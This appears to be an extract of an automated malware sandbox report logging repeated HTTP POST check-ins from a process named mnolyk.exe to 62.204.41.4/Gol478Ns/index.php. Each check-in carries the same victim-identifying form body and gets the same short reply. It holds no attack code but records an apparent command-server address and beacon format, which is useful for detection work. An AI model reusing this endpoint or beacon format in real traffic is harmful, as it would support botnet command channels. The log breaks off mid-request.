                                                                    Feb 8, 2023 21:32:45.537972927 CET508INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    309192.168.2.35001162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:45.719027042 CET509OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:45.784312963 CET509INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    31192.168.2.34973362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:24.349654913 CET232OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:24.413149118 CET232INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    310192.168.2.35001262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:45.968971014 CET510OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:46.034311056 CET510INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    311192.168.2.35001362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:46.214238882 CET511OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:46.280585051 CET511INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    312192.168.2.35001462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:46.467797041 CET512OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:46.531321049 CET512INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    313192.168.2.35001562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:46.699251890 CET513OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:46.764550924 CET513INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    314192.168.2.35001662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:46.966726065 CET514OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:47.030981064 CET514INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    315192.168.2.35001762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:47.204140902 CET515OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:47.270333052 CET515INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    316192.168.2.35001862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:47.458753109 CET516OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:47.523410082 CET516INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    317192.168.2.35001962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:47.697839022 CET517OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:47.762049913 CET517INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    318192.168.2.35002062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:47.936217070 CET518OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:48.005727053 CET518INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    319192.168.2.35002162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:48.182809114 CET519OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:48.248092890 CET519INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    32192.168.2.34973462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:24.588963032 CET233OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:24.653353930 CET233INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    320192.168.2.35002262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:48.431713104 CET520OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:48.495898962 CET520INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    321192.168.2.35002362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:48.666868925 CET521OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:48.731539965 CET521INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    322192.168.2.35002462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:48.907601118 CET522OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:48.970055103 CET522INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    323192.168.2.35002562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:49.239222050 CET523OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:49.345937967 CET523INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    324192.168.2.35002662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:50.554115057 CET524OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:50.621462107 CET524INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:50 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    325192.168.2.35002762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:50.791193008 CET525OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:50.854734898 CET525INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:50 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    326192.168.2.35002862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:51.047955990 CET526OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
